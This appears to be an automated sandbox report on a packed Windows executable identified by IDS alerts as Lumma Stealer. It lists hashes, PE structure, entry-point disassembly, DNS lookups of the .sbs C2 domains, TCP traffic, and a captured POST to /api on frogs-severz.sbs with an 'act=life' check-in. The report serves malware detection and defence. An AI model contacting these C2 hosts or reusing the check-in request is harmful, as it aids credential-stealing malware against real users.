                                                                      SHA512:5f5b8377654f8722de23bb307739fd0f8c0970b9e62296462be9895a829558c47e709091b62f38c5f7e4b751b3ac066cd2ffe3da18bcd0f3a313855e1f06c666
                                                                      SSDEEP:24576:PfIP5v7kkYfJQuEK+C10moYvTCk/Fgo0yuUgo/kQSrM33RO3dT6NWYcY6yyyc9:XYIrf5ldoY7V/FgtUtkQO8M3dT6wYcy
                                                                      TLSH:B78533CB071CD462C882157583AF2B1273A929E855BB92096C447A751EBF36FF423E4F
                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g.............................@I...........@..........................pI.....~U....@.................................\...p..

                                                                      File Icon

                                                                      Icon Hash:00928e8e8686b000

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x894000
                                                                      Entrypoint Section:.taggant
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:6
                                                                      OS Version Minor:0
                                                                      File Version Major:6
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:6
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp 00007F37B4FDB84Ah
                                                                      lar ebx, word ptr [eax+eax]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      jmp 00007F37B4FDD845h
                                                                      add byte ptr [edi], al
                                                                      or al, byte ptr [eax]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], dh
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [edi], bl
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [ecx], ah
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [ecx], al
                                                                      add byte ptr [eax], 00000000h
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      adc byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      pop es
                                                                      or al, byte ptr [eax]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], dh
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [edi], bl
                                                                      add byte ptr [eax+000000FEh], ah
                                                                      add byte ptr [edx], ah
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [ecx], al
                                                                      add byte ptr [eax], 00000000h
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      adc byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add dword ptr [edx], ecx
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      xor byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add dword ptr [eax+00000000h], eax
                                                                      add byte ptr [eax], al
                                                                      adc byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      pop es
                                                                      or al, byte ptr [eax]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], dh
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [edx], ah
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [ecx], al
                                                                      add byte ptr [eax], 00000000h
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      0x10000x560000x26200a5bad285fbadaf8f314b152eaed8b48eFalse0.9992955942622951data7.98162486605094IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0x570000x2b00x200f6e5ef71d4293163b92b20633d7f5565False0.794921875data6.022373815396692IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      0x590000x2a10000x2000e6d266bb5fcc59f399659c457cdd772unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      qozugtow0x2fa0000x1990000x198400ca62d69fe94c9e6e628dea36b08952b1False0.9945777757578077data7.953498445966998IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      qlsbilts0x4930000x10000x600a29aed7a73d77dc2bb5f5cf7c4e698b2False0.6009114583333334data5.251207823515013IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .taggant0x4940000x30000x2200a4df1fbdb74ab4a9bde6a9e41a3f6e6bFalse0.05698529411764706DOS executable (COM)0.7302447780823378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_MANIFEST0x4920c40x256ASCII text, with CRLF line terminators0.5100334448160535

                                                                      Imports

                                                                      DLLImport
                                                                      kernel32.dlllstrcpy

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-11-25T08:44:18.805230+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949722104.21.88.250443TCP
                                                                      2024-11-25T08:44:19.488836+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949722104.21.88.250443TCP
                                                                      2024-11-25T08:44:19.488836+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949722104.21.88.250443TCP
                                                                      2024-11-25T08:44:20.760278+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949728104.21.88.250443TCP
                                                                      2024-11-25T08:44:21.447383+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949728104.21.88.250443TCP
                                                                      2024-11-25T08:44:21.447383+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949728104.21.88.250443TCP
                                                                      2024-11-25T08:44:23.017010+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949734104.21.88.250443TCP
                                                                      2024-11-25T08:44:25.390045+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949740104.21.88.250443TCP
                                                                      2024-11-25T08:44:28.079334+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949746104.21.88.250443TCP
                                                                      2024-11-25T08:44:30.698245+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949756104.21.88.250443TCP
                                                                      2024-11-25T08:44:31.413842+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.949756104.21.88.250443TCP
                                                                      2024-11-25T08:44:33.207388+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949765104.21.88.250443TCP
                                                                      2024-11-25T08:44:37.037756+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949776104.21.88.250443TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 25, 2024 08:44:17.529583931 CET49722443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:17.529627085 CET44349722104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:17.529722929 CET49722443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:17.532907009 CET49722443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:17.532922983 CET44349722104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:18.805152893 CET44349722104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:18.805229902 CET49722443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:18.808540106 CET49722443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:18.808548927 CET44349722104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:18.808828115 CET44349722104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:18.850169897 CET49722443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:18.853734016 CET49722443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:18.853773117 CET49722443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:18.853984118 CET44349722104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:19.488953114 CET44349722104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:19.489202976 CET44349722104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:19.489322901 CET49722443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:19.490722895 CET49722443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:19.490741014 CET44349722104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:19.542676926 CET49728443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:19.542701960 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:19.542859077 CET49728443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:19.543056011 CET49728443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:19.543065071 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:20.760200977 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:20.760277987 CET49728443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:20.761779070 CET49728443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:20.761789083 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:20.762090921 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:20.763439894 CET49728443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:20.763470888 CET49728443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:20.763560057 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:21.447364092 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:21.447415113 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:21.447447062 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:21.447460890 CET49728443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:21.447490931 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:21.447532892 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:21.447546959 CET49728443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:21.447556019 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:21.447602034 CET49728443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:21.455631018 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:21.466938972 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:21.466990948 CET49728443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:21.467015982 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:21.475406885 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:21.475465059 CET49728443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:21.475478888 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:21.522102118 CET49728443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:21.566778898 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:21.615712881 CET49728443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:21.639014006 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:21.642923117 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:21.643028021 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:21.643105030 CET49728443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:21.643220901 CET49728443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:21.643234015 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:21.643245935 CET49728443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:21.643250942 CET44349728104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:21.760143042 CET49734443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:21.760175943 CET44349734104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:21.760288000 CET49734443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:21.760601997 CET49734443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:21.760615110 CET44349734104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:23.016808987 CET44349734104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:23.017009974 CET49734443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:23.019026041 CET49734443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:23.019035101 CET44349734104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:23.019304991 CET44349734104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:23.023818970 CET49734443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:23.024091005 CET49734443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:23.024123907 CET44349734104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:23.973788023 CET44349734104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:23.974045992 CET44349734104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:23.974117994 CET49734443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:23.974284887 CET49734443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:23.974299908 CET44349734104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:24.123691082 CET49740443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:24.123732090 CET44349740104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:24.123806000 CET49740443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:24.124239922 CET49740443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:24.124254942 CET44349740104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:25.389914989 CET44349740104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:25.390044928 CET49740443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:25.391454935 CET49740443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:25.391463995 CET44349740104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:25.391753912 CET44349740104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:25.393399000 CET49740443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:25.393522024 CET49740443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:25.393538952 CET44349740104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:25.393605947 CET49740443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:25.439331055 CET44349740104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:26.498856068 CET44349740104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:26.499099970 CET44349740104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:26.499120951 CET49740443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:26.499155998 CET49740443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:26.815727949 CET49746443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:26.815761089 CET44349746104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:26.815843105 CET49746443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:26.816123962 CET49746443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:26.816133976 CET44349746104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:28.079113960 CET44349746104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:28.079334021 CET49746443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:28.080498934 CET49746443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:28.080512047 CET44349746104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:28.080764055 CET44349746104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:28.081978083 CET49746443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:28.082108974 CET49746443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:28.082146883 CET44349746104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:28.082233906 CET49746443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:28.082252979 CET44349746104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:28.994473934 CET44349746104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:28.994615078 CET44349746104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:28.994699955 CET49746443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:28.995098114 CET49746443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:28.995116949 CET44349746104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:29.434848070 CET49756443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:29.434884071 CET44349756104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:29.434954882 CET49756443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:29.435277939 CET49756443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:29.435291052 CET44349756104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:30.698156118 CET44349756104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:30.698245049 CET49756443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:30.699563026 CET49756443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:30.699569941 CET44349756104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:30.700144053 CET44349756104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:30.701457977 CET49756443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:30.701533079 CET49756443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:30.701539993 CET44349756104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:31.413913012 CET44349756104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:31.414145947 CET44349756104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:31.414211035 CET49756443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:31.991705894 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:31.991746902 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:31.991986990 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:31.992461920 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:31.992476940 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:33.207298994 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:33.207387924 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:33.208933115 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:33.208947897 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:33.209281921 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:33.213157892 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:33.213985920 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:33.214027882 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:33.214128017 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:33.214167118 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:33.214318037 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:33.214346886 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:33.214463949 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:33.214492083 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:33.215373993 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:33.215392113 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:33.215565920 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:33.215598106 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:33.259361029 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:33.259542942 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:33.259581089 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:33.303334951 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:33.306135893 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:33.306194067 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:33.306211948 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:33.347351074 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:33.347513914 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:33.347568989 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:33.395333052 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:33.395456076 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:33.443341017 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:33.454358101 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:33.454437017 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:33.454550982 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:33.575773001 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:36.865252018 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:36.865339041 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:36.865412951 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:36.865561008 CET49765443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:36.865578890 CET44349765104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:36.906481981 CET49776443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:36.906523943 CET44349776104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:36.906609058 CET49776443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:36.906986952 CET49776443192.168.2.9104.21.88.250
                                                                      Nov 25, 2024 08:44:36.907002926 CET44349776104.21.88.250192.168.2.9
                                                                      Nov 25, 2024 08:44:37.037755966 CET49776443192.168.2.9104.21.88.250

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 25, 2024 08:44:17.067943096 CET5249953192.168.2.91.1.1.1
                                                                      Nov 25, 2024 08:44:17.298563004 CET53524991.1.1.1192.168.2.9
                                                                      Nov 25, 2024 08:44:17.303747892 CET5684953192.168.2.91.1.1.1
                                                                      Nov 25, 2024 08:44:17.524410009 CET53568491.1.1.1192.168.2.9

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Nov 25, 2024 08:44:17.067943096 CET192.168.2.91.1.1.10x3c6cStandard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                      Nov 25, 2024 08:44:17.303747892 CET192.168.2.91.1.1.10x371dStandard query (0)frogs-severz.sbsA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Nov 25, 2024 08:44:17.298563004 CET1.1.1.1192.168.2.90x3c6cName error (3)property-imper.sbsnonenoneA (IP address)IN (0x0001)false
                                                                      Nov 25, 2024 08:44:17.524410009 CET1.1.1.1192.168.2.90x371dNo error (0)frogs-severz.sbs104.21.88.250A (IP address)IN (0x0001)false
                                                                      Nov 25, 2024 08:44:17.524410009 CET1.1.1.1192.168.2.90x371dNo error (0)frogs-severz.sbs172.67.155.47A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • frogs-severz.sbs

                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.949722104.21.88.2504437660C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-25 07:44:18 UTC263OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 8
                                                                      Host: frogs-severz.sbs
                                                                      2024-11-25 07:44:18 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                      Data Ascii: act=life
                                                                      2024-11-25 07:44:19 UTC1007INHTTP/1.1 200 OK
                                                                      Date: Mon, 25 Nov 2024 07:44:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=attmf18nbhlaebv0r43rps4hje; expires=Fri, 21-Mar-2025 01:30:58 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
